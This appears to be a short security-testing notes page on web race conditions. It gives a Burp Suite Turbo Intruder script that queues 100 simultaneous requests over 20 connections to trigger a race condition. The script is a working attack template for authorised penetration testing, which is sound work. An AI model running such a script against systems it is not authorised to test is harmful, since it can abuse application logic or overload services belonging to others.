Web Race Condition
Investigation
Race Condition Attack using Turbo Intruder in Burp Suite
def queueRequests(target, wordlists): engine = RequestEngine( endpoint=target.endpoint, concurrentConnections=20, # change this value for race condition. requestsPerConnection=1, pipeline=False) # For loop requests i = 0 while i < 100: # this value is arbitrary but not very important for this situation. engine.queue(target.req, None) i += 1 def handleResponse(req, interesting): if interesting: table.add(req)
Last updated